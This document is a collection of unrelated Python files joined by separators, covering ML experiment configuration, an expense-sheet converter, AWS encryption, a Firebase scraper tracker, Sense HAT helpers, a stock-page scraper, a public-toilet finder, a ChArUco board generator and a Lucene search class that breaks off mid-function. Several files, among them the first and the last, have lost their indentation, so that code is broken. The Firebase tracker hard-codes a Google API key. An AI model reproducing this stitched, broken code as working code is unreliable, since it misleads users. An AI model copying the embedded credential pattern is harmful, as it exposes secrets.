# """
# if type(data_string) is dict:
# features =data_string["features"]
# target =data_string["target"]
# if data_string.get("target_col"):
# target_col = data_string.get("target_col")
# else:
# target_col = "target"
# if data_string.get("train_test_group"):
# train_test = data_string.get("train_test_group")
# else:
# train_test = "group"
# elif type(data_string) is tuple:
# features = data_string[0]
# target = data_string[1]
# target_col = "target"
# train_test = "group"
#
# else:
# raise Exception("Data has to be expressed in either a tuple (features,target) or dictionary {\"features\":\"your_features\","+
# "\"target\":\"your_target\"")
# # opening data
# data_directory = "../../data/processed/"
# try:
# X = pd.read_csv(data_directory + features, index_col=0)
# y = pd.read_csv(data_directory + target, index_col=0, encoding="ISO-8859-1")
# except FileNotFoundError:
# print("Files not in data/preprocessed, searching for them in the application's directory. You should run the"+
# " program from its directory: python program.py instead of python /somewhere/else/program.py")
# X = pd.read_csv(features, index_col=0)
# y = pd.read_csv(target, index_col=0, encoding="ISO-8859-1")
# except pd.errors.ParserError as e:
# print("Pandas seams to be unable to read this file. Make sure it's a csv")
# raise e
# except UnicodeDecodeError as e:
# print("The encoding of either the features or the targets is not encoded using UTF-8 or ISO-8859-1")
# raise e
# y_target = indexing_columns(target, y, target_col)
# try:
# # Get group column
# y_group = indexing_columns(target, y, train_test)
# except KeyError:
# # If it doesnt exist assign target column as group column as well
# y_group = y_target
# train_test = target_col
# return (features,target,target_col,train_test),X,y,y_target,y_group
data_directory ="../../data/processed/"
def convert_string_dictionary(list_of_hypothesis:list):
"""
Parses the list of dictionaries that make up the configuration to objects and files used by experiments.
It outputs a list of dictionaries used for the creation of experiment instances
:param list_of_hypothesis:
:return:
list of dictionaries of all combinations
"""
list_of_experiment_configurations = []
print("Converting configuration file into a list of attributes that will be used for creating Experiments")
# Looping through all dictionaries in the list
for hypothesis in list_of_hypothesis:
# Each hypothesis is made up of data, including target and group column, and how train and test are created
data_tuples =[read_datasets(i) for i in hypothesis["Data"]]
data_dict ={
"data_tuples" : [{"names":(i[0],i[1]),"X":i[2],"meta_data":i[3],"target_column":i[4],"train_test_column":i[5]} for i in data_tuples],
"train_test_split_method" : [mth.catch(model_selection,StratifiedKFold(), k,
) for k in hypothesis["train_test_split_method"]]}
# After parsing in all data, a list of all combinations is created between
list_data_dict = list(mth.my_product(data_dict,just_values=False))
list_of_settings= []
for i in hypothesis["models"]:
# Looping through all settings for the particular data
literal_dict = {}
# model_dict =[k["name"].lower for k in i.pop("model_name")]
literal_dict["estimators"] = [(select_estimator(k)) for k in i.pop("estimators")]
try:
literal_dict["resampler"] = [mth.catch(imblearn.over_sampling,imblearn.FunctionSampler(), k) for k in i.pop("resampler")]
except KeyError:
# If none is present or if resampler was not even mentioned
# print("no resampler chosen")
literal_dict["resampler"] =[imblearn.FunctionSampler()]
try:
literal_dict["scaler"] = [mth.catch(preprocessing, preprocessing.FunctionTransformer(validate=False), k) for k in i.pop("scaler")]
except (KeyError):
# If none is present or if scaler was not even mentioned
literal_dict["scaler"] = [preprocessing.FunctionTransformer(validate= False)]
try:
literal_dict["css_normalisation"] = [css_choices.get(string_to_key(k)) for k in i.pop("css")]
except KeyError:
literal_dict["css_normalisation"] = [CSSNormaliser(identity=True)]
try:
literal_dict["cv_method"] = [cv_choices.get(string_to_key(k)) for k in i.pop("cv")]
except KeyError:
print("The default \"grid\" search method has been selected")
literal_dict["cv_method"] =["_cv"]
try:
validation_method_group =[]
for k in i.pop("validation"):
validation_method_group.append( (mth.catch(model_selection,None, k),
k.get("group_col")))
except KeyError:
validation_method_group = [(None,None)] # The default method is the same as the train-test split
#validation_group =None # The default group is the train-test group [k[3] for k in data_tuples]
literal_dict["validation_method_group"] = validation_method_group
try:
literal_dict["draws"] = i.pop("draws")
except KeyError:
literal_dict["draws"] = [100]
kwargs = i
# a list of all possible combination of settings
combination_of_choices =list(mth.my_product(literal_dict, just_values=False))
for number,element in enumerate(combination_of_choices):
combination_of_choices[number] = {**element.pop("estimators"),**element,**kwargs}
# appending the list of configurations to a global list
list_of_settings += combination_of_choices
            # adding kwargs back to all elements and pulling the estimators dictionary out so that it is more accessible
# combinations of data and model choices
list_of_experiment_configurations += [{**value[0],**value[1]} for value in product(list_data_dict,list_of_settings)]
return list_of_experiment_configurations
def create_and_run_exp(configurations:list):
"""
    Creates and runs the experiments for the list of parsed configurations.
:param configurations:
:return:
"""
list_of_experiments = []
experiment_results = {}
    # a list of all the parsed configurations that are going to be used for experiment creation
list_of_settings = convert_string_dictionary(configurations)
os.makedirs(os.path.join(project_dir, "experiments"), exist_ok=True)
experiments_file = open(project_dir+ "/experiments/experiment_objects"+day_time_string+".pickl","wb")
# The first element in the pickle is the number of experiments to be saved
pickle.dump(len(list_of_settings),experiments_file)
print("Converting the list of settings to Experiment objects. Upon running each Experiment they are then saved in "
"a pickle file found in peru-rivers/experiments")
for settings in list_of_settings:
data_dictionary = settings.pop("data_tuples")
try: X = data_dictionary.pop("X")
except KeyError: pass
exp_instance = Experiment(**{**data_dictionary,**settings})
list_of_experiments.append(exp_instance)
try:
print(exp_instance)
# Run experiment
exp_result = exp_instance.run(X,data_dictionary["meta_data"])
# Store object
pickle.dump(exp_instance,experiments_file)
list_of_experiments.append(exp_instance)
# adding to results the parameters of the experiment to make it easier to store them
exp_result = {**exp_instance.return_dictionary(),**exp_result,"accuracy":exp_instance.accuracy}
# experiment_results.setdefault("classifier",[]).append(exp_instance.estimator_name)
# experiment_results.setdefault("CSS", []).append(str(exp_instance.css))
# experiment_results.setdefault("scaler", []).append(str(exp_instance.scaler))
# experiment_results.setdefault("resampler", []).append(str(exp_instance.resampler))
# experiment_results.setdefault("data_names", []).append(exp_instance.names)
# experiment_results.setdefault("target_column", []).append(str(exp_instance.target_column))
# experiment_results.setdefault("accuracy", []).append(exp_instance.accuracy)
for j in exp_result.keys():
experiment_results.setdefault(j,[]).append(exp_result[j])
except ValueError as vale:
# This error arises when the GroupKFold method fails to split the data because the number of distinct groups in
# validation variable is less than the number of splits
print(vale)
# print(exp_instance.validation_method," can't split ", exp_instance.validation_group, " because the number of "
# "splits is more than the number of factors in the grouping variable")
continue
experiments_file.close()
return experiment_results,list_of_experiments
experiment_results,__ = create_and_run_exp(configuration_list)
resultsdf = pd.DataFrame(experiment_results)
# if the results directory does not exist then create it
os.makedirs(os.path.join(project_dir,"results/supervised"), exist_ok=True)
resultsdf.to_pickle(os.path.join(project_dir,"results/supervised",results_prefix+"results")+day_time_string+".pickl")
|
from datetime import datetime
from io import DEFAULT_BUFFER_SIZE
import pandas as pd
import openpyxl
from sqlalchemy import create_engine
sourceFile="Family expenses.xlsm"
outputFile="Family expenses.csv"
outputJSON="Family expenses.json"
book = openpyxl.load_workbook(
sourceFile, data_only=True, read_only=True
)
dfExpense = pd.read_excel(
sourceFile,
sheet_name="Expenses DB",
skiprows=9,
usecols="J,Q:U",
)
dfIncome = pd.read_excel(
sourceFile,
sheet_name="Income DB",
skiprows=9,
usecols="J,Q:U",
)
dfExpense["Amount"] *= -1
dfIncome.rename(columns={"Type ": "Category"}, inplace=True)
dfIncome["Store"] = "NA"
dfIncome["Exclude in WE"] = "NA"
dfResult = pd.concat([dfExpense, dfIncome])
dfResult.sort_values(by="Date", inplace=True)
dfResult.rename(columns={"Exclude in WE": "ExcludeWE"}, inplace=True)
dfResult["Date"] = dfResult["Date"].dt.strftime("%Y-%m-%dT00:00:00.000Z")
dfResult["created_at"] = datetime.now().strftime("%Y-%m-%dT00:00:00.000Z")
dfResult["updated_at"] = datetime.now().strftime("%Y-%m-%dT00:00:00.000Z")
cols = [
"Date",
"created_at",
"updated_at",
"Store",
"Category",
"Amount",
"ExcludeWE",
"Description",
]
dfResult = dfResult[cols]
print(dfResult)
dfResult.to_csv(outputFile, index=False)
dfResult.to_json(path_or_buf=outputJSON, orient="records")
engine = create_engine(
"sqlite:////home/ubuntu/repos/go/src/github.com/jsburckhardt/goexpenses/expenses.db",
echo=False,
)
dfResult.to_sql("expenses", con=engine, if_exists="append", index=False)
|
import kronos
from orchestra.communication.staffing import send_staffing_requests
@kronos.register('* * * * *') # run every minute
def send_staffing_requests_periodically():
send_staffing_requests()
|
# numbers = [2,3,1,5]
# min_number = min(numbers)
# max_number = max(numbers)
x = 2
y = 5
min_number = min(x,y)
max_number = max(x,y)
print(min_number)
print(max_number)
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Example showing encryption of a value already in memory using one KMS CMK, then decryption of the ciphertext using
a DiscoveryAwsKmsMasterKeyProvider.
"""
import aws_encryption_sdk
from aws_encryption_sdk import CommitmentPolicy
from aws_encryption_sdk.internal.arn import arn_from_str
from aws_encryption_sdk.key_providers.kms import DiscoveryFilter
def encrypt_decrypt(key_arn, source_plaintext, botocore_session=None):
"""Encrypts a string under one KMS customer master key (CMK), then decrypts it using discovery mode.
:param str key_arn: Amazon Resource Name (ARN) of the KMS CMK
:param bytes source_plaintext: Data to encrypt
:param botocore_session: existing botocore session instance
:type botocore_session: botocore.session.Session
"""
encrypt_kwargs = dict(key_ids=[key_arn])
if botocore_session is not None:
encrypt_kwargs["botocore_session"] = botocore_session
# Set up an encryption client with an explicit commitment policy. Note that if you do not explicitly choose a
# commitment policy, REQUIRE_ENCRYPT_REQUIRE_DECRYPT is used by default.
client = aws_encryption_sdk.EncryptionSDKClient(commitment_policy=CommitmentPolicy.REQUIRE_ENCRYPT_REQUIRE_DECRYPT)
# Create strict master key provider that is only allowed to encrypt and decrypt using the ARN of the provided key.
strict_key_provider = aws_encryption_sdk.StrictAwsKmsMasterKeyProvider(**encrypt_kwargs)
# Encrypt the plaintext using the AWS Encryption SDK. It returns the encrypted message and the header
ciphertext, encrypted_message_header = client.encrypt(source=source_plaintext, key_provider=strict_key_provider)
# Create a second master key provider in discovery mode that does not explicitly list the key used to encrypt.
# Note: The discovery_filter argument is optional; if you omit this, the AWS Encryption SDK attempts to
# decrypt any ciphertext it receives.
arn = arn_from_str(key_arn)
decrypt_kwargs = dict(discovery_filter=DiscoveryFilter(account_ids=[arn.account_id], partition=arn.partition))
if botocore_session is not None:
encrypt_kwargs["botocore_session"] = botocore_session
discovery_key_provider = aws_encryption_sdk.DiscoveryAwsKmsMasterKeyProvider(**decrypt_kwargs)
# Decrypt the encrypted message using the AWS Encryption SDK. It returns the decrypted message and the header.
plaintext, decrypted_message_header = client.decrypt(source=ciphertext, key_provider=discovery_key_provider)
# Verify that the original message and the decrypted message are the same
assert source_plaintext == plaintext
# Verify that the encryption context of the encrypted message and decrypted message match
assert all(
pair in encrypted_message_header.encryption_context.items()
for pair in decrypted_message_header.encryption_context.items()
)
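# Illustrative invocation sketch (the ARN below is a placeholder, not a real key):
#   encrypt_decrypt(
#       key_arn="arn:aws:kms:us-west-2:111122223333:key/EXAMPLE-KEY-ID",
#       source_plaintext=b"Hello, discovery mode!",
#   )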
|
import firebase_admin
import requests
from firebase_admin import credentials, firestore
import datetime
import sys
class ScriptTracker:
def __init__(self):
self.starting_time = datetime.datetime.now()
self.email = ''
self.password = ''
self._verify_password_url = 'https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword'
self.api_key = "AIzaSyAclqlFVOFaxoZ9KKVVxSOqPImc9Kp4RjE"
self.script_name = ''
self.total_done = 0
self.total_crashed = 0
self.unique_crash_logs = []
self.uid = ''
self.cred = credentials.Certificate("live-scraping-firebase-adminsdk-gck9g-011e4f00e1.json")
self.firebase = firebase_admin.initialize_app(self.cred)
self.db = firestore.client()
self.users_ref = self.db.collection(u'scrappers')
self.docs = None
self.current_scrappers_data = None
self.status = 'Running'
def set_status_to_completed(self):
self.status = 'Completed'
self.docs = self.users_ref.stream()
for doc in self.docs:
if doc.id == self.uid:
self.current_scrappers_data = doc.to_dict()
self.current_scrappers_data[self.script_name]['status'] = self.status
self.users_ref.document(self.uid).set(self.current_scrappers_data)
def set_status_to_crashed(self):
self.status = 'Crashed'
self.docs = self.users_ref.stream()
for doc in self.docs:
if doc.id == self.uid:
self.current_scrappers_data = doc.to_dict()
self.current_scrappers_data[self.script_name]['status'] = self.status
self.users_ref.document(self.uid).set(self.current_scrappers_data)
def initialize(self, inp_email, inp_password, script_name):
self.email = inp_email
self.password = inp_password
self.script_name = script_name
body = {'email': self.email, 'password': self.password}
params = {'key': self.api_key}
try:
resp = requests.request('post', self._verify_password_url, params=params, json=body)
resp.raise_for_status()
self.uid = resp.json().get('localId')
print('Logged In Successfully !!')
self.docs = self.users_ref.stream()
for doc in self.docs:
if doc.id == self.uid:
self.current_scrappers_data = doc.to_dict()
except Exception as e:
print('Could not Log In, Please make sure that you have created an account on Mobile Application ')
sys.exit()
def send_data(self, total_done, total_crashed, unique_crash_logs):
time_now = datetime.datetime.now()
time_elapsed = time_now - self.starting_time
total_seconds = time_elapsed.total_seconds()
        # Split the elapsed time into whole hours and the remaining minutes
        hours, remainder = divmod(int(total_seconds), 3600)
        minutes = int(remainder) // 60
        time_elapsed = str(hours) + ':' + str(minutes)
new_scrapper_data = {
'time_elapsed': time_elapsed,
'records_crashed': total_crashed,
'records_scraped': total_done,
'script_name': self.script_name,
'status': self.status,
'unique_crash_logs': list(set(unique_crash_logs))
}
self.current_scrappers_data[self.script_name] = new_scrapper_data
self.users_ref.document(self.uid).set(self.current_scrappers_data)
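if __name__ == '__main__':
    # Hedged usage sketch (not part of the original class): the e-mail, password
    # and script name are placeholders, and the service-account JSON referenced
    # in __init__ must exist for the constructor to succeed.
    tracker = ScriptTracker()
    tracker.initialize('user@example.com', 'password', 'example_scraper')
    tracker.send_data(total_done=10, total_crashed=1, unique_crash_logs=['timeout'])
    tracker.set_status_to_completed()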
|
from gpiozero import Button
from sense_hat import SenseHat
A = Button(16)
B = Button(21)
UP = Button(26)
DOWN = Button(13)
LEFT = Button(20)
RIGHT = Button(19)
sense = SenseHat()
R = [255, 0, 0]
G = [0, 255, 0]
W = [255, 255, 255]
K = [0, 0, 0]  # black; renamed from B so it does not overwrite the Button on GPIO 21 defined above
def redCross():
redCross = [
R, W, W, W, W, W, W, R,
W, R, W, W, W, W, R, W,
W, W, R, W, W, R, W, W,
W, W, W, R, R, W, W, W,
W, W, W, R, R, W, W, W,
W, W, R, W, W, R, W, W,
W, R, W, W, W, W, R, W,
R, W, W, W, W, W, W, R
]
sense.set_pixels(redCross)
def greenTick():
greenTick = [
W, W, W, W, W, W, W, G,
W, W, W, W, W, W, W, G,
W, W, W, W, W, W, G, W,
W, W, W, W, W, W, G, W,
W, W, W, W, W, G, W, W,
G, W, W, W, W, G, W, W,
W, G, W, W, G, W, W, W,
W, W, G, G, W, W, W, W
]
sense.set_pixels(greenTick)
def white():
white = [
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W
]
sense.set_pixels(white)
def resetPixels():
black = [
        K, K, K, K, K, K, K, K,
        K, K, K, K, K, K, K, K,
        K, K, K, K, K, K, K, K,
        K, K, K, K, K, K, K, K,
        K, K, K, K, K, K, K, K,
        K, K, K, K, K, K, K, K,
        K, K, K, K, K, K, K, K,
        K, K, K, K, K, K, K, K,
]
sense.set_pixels(black)
def showText(text):
sense.show_message(str(text))
def getTemperature():
return sense.get_temperature()
def getHumidity():
return sense.get_humidity()
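if __name__ == '__main__':
    # Hedged wiring sketch (not part of the original module): map the six buttons
    # to the display helpers above and idle until interrupted; pin numbers are
    # the ones already defined at the top of this file.
    from signal import pause
    A.when_pressed = greenTick
    B.when_pressed = redCross
    UP.when_pressed = white
    DOWN.when_pressed = resetPixels
    LEFT.when_pressed = lambda: showText(round(getTemperature(), 1))
    RIGHT.when_pressed = lambda: showText(round(getHumidity(), 1))
    pause()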
|
# Generated by Django 2.0.5 on 2019-11-11 15:41
from django.db import migrations
import sorl.thumbnail.fields
class Migration(migrations.Migration):
dependencies = [
('publicaciones', '0008_auto_20191107_0944'),
]
operations = [
migrations.AlterField(
model_name='publicacion',
name='imagen',
            field=sorl.thumbnail.fields.ImageField(blank=True, help_text='Tamaño recomendado: 360x390', null=True, upload_to='publicaciones/img/'),
),
]
|
import datetime
import os
import time
import requests
from lxml import etree, html
def get_table(page_html: requests.Response, headers, rows=None, **kwargs):
""" Private function used to return table data inside a list of dictionaries. """
if isinstance(page_html, str):
page_parsed = html.fromstring(page_html)
else:
page_parsed = html.fromstring(page_html.text)
# When we call this method from Portfolio we don't fill the rows argument.
# Conversely, we always fill the rows argument when we call this method from Screener.
# Also, in the portfolio page, we don't need the last row - it's redundant.
if rows is None:
rows = -2 # We'll increment it later (-1) and use it to cut the last row
data_sets = []
# Select the HTML of the rows and append each column text to a list
all_rows = [
column.xpath("td//text()")
for column in page_parsed.cssselect('tr[valign="top"]')
]
# If rows is different from -2, this function is called from Screener
if rows != -2:
for row_number, row_data in enumerate(all_rows, 1):
data_sets.append(dict(zip(headers, row_data)))
if row_number == rows: # If we have reached the required end
break
else:
# Zip each row values to the headers and append them to data_sets
[data_sets.append(dict(zip(headers, row))) for row in all_rows]
return data_sets
def get_total_rows(page_content):
""" Returns the total number of rows(results). """
total_element = page_content.cssselect('td[width="140"]')
total_number = (
etree.tostring(total_element[0]).decode("utf-8").split("</b>")[1].split()[0]
)
try:
return int(total_number)
except ValueError:
return 0
def get_page_urls(page_content, rows, url):
""" Returns a list containing all of the page URL addresses. """
total_pages = int(
[i.text.split("/")[1] for i in page_content.cssselect('option[value="1"]')][0]
)
urls = []
for page_number in range(1, total_pages + 1):
sequence = 1 + (page_number - 1) * 20
if sequence - 20 <= rows < sequence:
break
urls.append(url + f"&r={str(sequence)}")
return urls
def download_chart_image(page_content: requests.Response, **kwargs):
""" Downloads a .png image of a chart into the "charts" folder. """
file_name = f"{kwargs['URL'].split('t=')[1]}_{int(time.time())}.png"
if not os.path.exists("charts"):
os.mkdir("charts")
with open(os.path.join("charts", file_name), "wb") as handle:
handle.write(page_content.content)
def get_analyst_price_targets_for_export(
ticker=None, page_content=None, last_ratings=5
):
analyst_price_targets = []
try:
table = page_content.cssselect('table[class="fullview-ratings-outer"]')[0]
ratings_list = [row.xpath("td//text()") for row in table]
ratings_list = [
[val for val in row if val != "\n"] for row in ratings_list
] # remove new line entries
headers = [
"ticker",
"date",
"category",
"analyst",
"rating",
"price_from",
"price_to",
] # header names
count = 0
for row in ratings_list:
if count == last_ratings:
break
price_from, price_to = (
0,
0,
) # default values for len(row) == 4 , that is there is NO price information
if len(row) == 5:
                strings = row[4].split("→")
if len(strings) == 1:
price_to = (
strings[0].strip(" ").strip("$")
) # if only ONE price is available then it is 'price_to' value
else:
price_from = (
strings[0].strip(" ").strip("$")
) # both '_from' & '_to' prices available
price_to = strings[1].strip(" ").strip("$")
elements = [
ticker,
datetime.datetime.strptime(row[0], "%b-%d-%y").strftime("%Y-%m-%d"),
]
elements.extend(row[1:3])
            elements.append(row[3].replace("→", "->"))
elements.append(price_from)
elements.append(price_to)
data = dict(zip(headers, elements))
analyst_price_targets.append(data)
count += 1
except Exception:
pass
return analyst_price_targets
def download_ticker_details(page_content: requests.Response, **kwargs):
data = {}
ticker = kwargs["URL"].split("=")[1]
page_parsed = html.fromstring(page_content.text)
all_rows = [
row.xpath("td//text()")
for row in page_parsed.cssselect('tr[class="table-dark-row"]')
]
for row in all_rows:
for column in range(0, 11):
if column % 2 == 0:
data[row[column]] = row[column + 1]
if len(data) == 0:
print(f"-> Unable to parse page for ticker: {ticker}")
return {ticker: [data, get_analyst_price_targets_for_export(ticker, page_parsed)]}
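if __name__ == "__main__":
    # Hedged usage sketch, not part of the original module: the quote URL and the
    # User-Agent header below are assumptions, and finviz may throttle or block
    # unidentified clients, so treat this purely as an illustration.
    quote_url = "https://finviz.com/quote.ashx?t=AAPL"
    response = requests.get(quote_url, headers={"User-Agent": "Mozilla/5.0"})
    details = download_ticker_details(response, URL=quote_url)
    print(details)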
|
#!/usr/local/bin/python3
# coding: utf-8
try:
import json, requests, urllib
from geopy.geocoders import Nominatim
from geopy.distance import vincenty
except:
print("Error importing modules, exiting.")
exit()
api_url = "http://opendata.iprpraha.cz/CUR/FSV/FSV_VerejnaWC_b/WGS_84/FSV_VerejnaWC_b.json"
def find(address):
# convert address to latlong
me = locate(address+", Prague")
if me == None:
return None
toilets = getToilets(api_url)
# Get closest toilet
wcID = getClosestID(me, toilets)
wc = toilets[wcID-1]
data = []
try:
address = wc['properties']['ADRESA']
except:
address = "Address not available."
try:
typ = wc['properties']['TYP']
except:
typ = ""
r = "Closest public toilet is {} meters away.\n{}".format(getDist(me, wc), address)
return [r , getCoords(wc)]
def getClosestID(me, toilets):
a = {}
for toilet in toilets:
ID = toilet['properties']['OBJECTID']
a[ID] = getDist(me, toilet)
closest = min(a,key=a.get) # list offset
print("ID {} is {} meters away.".format(closest,a[closest]))
return closest
def getDist( coords, toilet):
loc = toilet['geometry']['coordinates']
loc = (loc[1],loc[0]) # Switch coords position
dist = round(vincenty(coords, loc).meters)
return dist
def getCoords(toilet):
loc = toilet['geometry']['coordinates']
return (loc[1],loc[0])
def locate(address):
geolocator = Nominatim()
location = geolocator.geocode(address)
if location:
coords = (location.latitude, location.longitude)
return coords
return None
def getToilets(url):
# outputs list of dicts
response = requests.get(url)
content = response.content.decode('utf-8')
js = json.loads(content)
return js['features']
# x = find("Staroměstské náměstí")  # example address (placeholder)
# print(x)
|
import os
import cv2
import cv2.aruco as aruco
# ChAruco board variables
CHARUCOBOARD_ROWCOUNT = 4
CHARUCOBOARD_COLCOUNT = 4
# CHARUCO_DICT = aruco.Dictionary_get(aruco.DICT_4X4_50)
# CHARUCO_DICT = aruco.Dictionary_get(aruco.DICT_5X5_50)
CHARUCO_DICT = aruco.Dictionary_get(aruco.DICT_5X5_1000)
# ARUCO_DICT = aruco.Dictionary_get(aruco.DICT_7X7_1000)
# CHARUCO_DICT = aruco.getPredefinedDictionary(aruco.DICT_6X6_1000)
# Create constants to be passed into OpenCV and Aruco methods
# Length of the squares and markers must be in the same units.
CHARUCO_BOARD = aruco.CharucoBoard_create(
squaresX=CHARUCOBOARD_COLCOUNT,
squaresY=CHARUCOBOARD_ROWCOUNT,
# squareLength=0.19134,
# markerLength=0.1424,
# squareLength=0.9,
# markerLength=0.8,
# squareLength=40,
# markerLength=30,
squareLength=90,
markerLength=75,
dictionary=CHARUCO_DICT,
)
CHARUCO_PARAMS = aruco.DetectorParameters_create()
# board = aruco.CharucoBoard_create(5, 7, squareLength, markerLength, aruco_dict)
if __name__ == "__main__":
# print(CHARUCO_BOARD.dictionary)
charuco_board_image = CHARUCO_BOARD.draw((600, 500), marginSize=10, borderBits=1)
    os.makedirs("images", exist_ok=True)
    charuco_path = f"images/charuco_board_{CHARUCOBOARD_ROWCOUNT}x{CHARUCOBOARD_COLCOUNT}_{aruco.DICT_5X5_1000}.png"
cv2.imwrite(
charuco_path,
charuco_board_image,
)
print(f"{charuco_path}, Done!")
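    # Hedged sanity check (not in the original script): re-read the generated
    # board image and confirm its markers can be detected with the same
    # dictionary and detector parameters defined above.
    board_gray = cv2.imread(charuco_path, cv2.IMREAD_GRAYSCALE)
    corners, ids, _rejected = aruco.detectMarkers(board_gray, CHARUCO_DICT, parameters=CHARUCO_PARAMS)
    print(f"Detected {0 if ids is None else len(ids)} markers in {charuco_path}")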
|
# -*- coding: utf-8 -*-
'''
Use Lucene to retrieve candidate documents for given a query.
'''
import shutil
import os
import lucene
import parameters as prm
import utils
import itertools
from java.nio.file import Paths
from org.apache.lucene.analysis.standard import StandardAnalyzer
from org.apache.lucene.document import Document, Field, FieldType
from org.apache.lucene.index import FieldInfo, DirectoryReader, IndexWriter, IndexWriterConfig, IndexOptions
from org.apache.lucene.store import SimpleFSDirectory, NIOFSDirectory, MMapDirectory
from org.apache.lucene.util import Version
from org.apache.lucene.search import IndexSearcher, MatchAllDocsQuery, BooleanQuery
from org.apache.lucene.queryparser.classic import QueryParser
import time
from collections import OrderedDict, defaultdict
from multiprocessing.pool import ThreadPool
import Queue
import math
from nltk.tokenize import wordpunct_tokenize
import cPickle as pkl
class LuceneSearch():
def __init__(self):
self.env = lucene.initVM(initialheap='28g', maxheap='28g', vmargs=['-Djava.awt.headless=true'])
self.vocab = None
BooleanQuery.setMaxClauseCount(2048)
if not os.path.exists(prm.index_folder):
print 'Creating index at', prm.index_folder
if prm.docs_path == prm.docs_path_term:
add_terms = True
else:
add_terms = False
self.create_index(prm.index_folder, prm.docs_path, add_terms)
if prm.local_index_folder:
print 'copying index from', prm.index_folder, 'to', prm.local_index_folder
if os.path.exists(prm.local_index_folder):
print 'Folder', prm.local_index_folder, 'already exists! Doing nothing.'
else:
shutil.copytree(prm.index_folder, prm.local_index_folder)
self.index_folder = prm.local_index_folder
else:
self.index_folder = prm.index_folder
        fsDir = MMapDirectory(Paths.get(self.index_folder))
self.searcher = IndexSearcher(DirectoryReader.open(fsDir))
if prm.docs_path != prm.docs_path_term:
if not os.path.exists(prm.index_folder_term):
print 'Creating index at', prm.index_folder_term
self.create_index(prm.index_folder_term, prm.docs_path_term, add_terms=True)
if prm.local_index_folder_term:
print 'copying index from', prm.index_folder_term, 'to', prm.local_index_folder_term
if os.path.exists(prm.local_index_folder_term):
print 'Folder', prm.local_index_folder_term, 'already exists! Doing nothing.'
else:
shutil.copytree(prm.index_folder_term, prm.local_index_folder_term)
self.index_folder_term = prm.local_index_folder_term
else:
self.index_folder_term = prm.index_folder_term
            fsDir_term = MMapDirectory(Paths.get(self.index_folder_term))
self.searcher_term = IndexSearcher(DirectoryReader.open(fsDir_term))
self.analyzer = StandardAnalyzer()
self.pool = ThreadPool(processes=prm.n_threads)
self.cache = {}
print 'Loading Title-ID mapping...'
self.title_id_map, self.id_title_map = self.get_title_id_map()
def get_title_id_map(self):
# get number of docs
n_docs = self.searcher.getIndexReader().numDocs()
title_id = {}
id_title = {}
query = MatchAllDocsQuery()
hits = self.searcher.search(query, n_docs)
for hit in hits.scoreDocs:
doc = self.searcher.doc(hit.doc)
idd = int(doc['id'])
title = doc['title']
title_id[title] = idd
id_title[idd] = title
return title_id, id_title
def add_doc(self, doc_id, title, txt, add_terms):
doc = Document()
txt = utils.clean(txt)
if add_terms:
txt_ = txt.lower()
words_idx, words = utils.text2idx2([txt_], self.vocab, prm.max_terms_per_doc)
words_idx = words_idx[0]
words = words[0]
doc.add(Field("id", str(doc_id), self.t1))
doc.add(Field("title", title, self.t1))
doc.add(Field("text", txt, self.t2))
if add_terms:
doc.add(Field("word_idx", ' '.join(map(str,words_idx)), self.t3))
doc.add(Field("word", '<&>'.join(words), self.t3))
self.writer.addDocument(doc)
def create_index(self, index_folder, docs_path, add_terms=False):
print 'Loading Vocab...'
if not self.vocab:
self.vocab = utils.load_vocab(prm.vocab_path, prm.n_words)
os.mkdir(index_folder)
self.t1 = FieldType()
self.t1.setStored(True)
self.t1.setIndexOptions(IndexOptions.DOCS)
self.t2 = FieldType()
self.t2.setStored(False)
self.t2.setIndexOptions(IndexOptions.DOCS_AND_FREQS)
self.t3 = FieldType()
self.t3.setStored(True)
self.t3.setIndexOptions(IndexOptions.NONE)
fsDir = MMapDirectory(Paths.get(index_folder))
writerConfig = IndexWriterConfig(StandardAnalyzer())
self.writer = IndexWriter(fsDir, writerConfig)
print "%d docs in index" % self.writer.numDocs()
print "Indexing documents..."
doc_id = 0
import corpus_hdf5
corpus = corpus_hdf5.CorpusHDF5(docs_path)
for txt in corpus.get_text_iter():
title = corpus.get_article_title(doc_id)
self.add_doc(doc_id, title, txt, add_terms)
if doc_id % 1000 == 0:
print 'indexing doc', doc_id
doc_id += 1
print "Index of %d docs..." % self.writer.numDocs()
self.writer.close()
def search_multithread(self, qs, max_cand, max_full_cand, searcher):
self.max_cand = max_cand
self.max_full_cand = max_full_cand
self.curr_searcher = searcher
out = self.pool.map(self.search_multithread_part, qs)
return out
def search_multithread_part(self, q):
if not self.env.isCurrentThreadAttached():
self.env.attachCurrentThread()
if q in self.cache:
return self.cache[q]
else:
try:
q = q.replace('AND','\\AND').replace('OR','\\OR').replace('NOT','\\NOT')
query = QueryParser("text", self.analyzer).parse(QueryParser.escape(q))
except:
print 'Unexpected error when processing query:', str(q)
print 'Using query "dummy".'
q = 'dummy'
query = QueryParser("text", self.analyzer).parse(QueryParser.escape(q))
c = OrderedDict()
hits = self.curr_searcher.search(query, self.max_cand)
for i, hit in enumerate(hits.scoreDocs):
doc = self.curr_searcher.doc(hit.doc)
if i < self.max_full_cand:
word_idx = map(int, doc['word_idx'].split(' '))
word = doc['word'].split('<&>')
else:
word_idx = []
word = []
c[int(doc['id'])] = [word_idx, word]
return c
def search_singlethread(self, qs, max_cand, max_full_cand, curr_searcher):
out = []
for q in qs:
if q in self.cache:
out.append(self.cache[q])
else:
try:
q = q.replace('AND','\\AND').replace('OR','\\OR').replace('NOT','\\NOT')
query = QueryParser("text", self.analyzer).parse(QueryParser.escape(q))
except:
print 'Unexpected error when processing query:', str(q)
print 'Using query "dummy".'
query = QueryParser("text", self.analyzer).parse(QueryParser.escape('dummy'))
c = OrderedDict()
hits = curr_searcher.search(query, max_cand)
for i, hit in enumerate(hits.scoreDocs):
doc = curr_searcher.doc(hit.doc)
if i < max_full_cand:
word_idx = map(int, doc['word_idx'].split(' '))
word = doc['word'].split('<&>')
else:
word_idx = []
word = []
c[int(doc['id'])] = [word_idx, word]
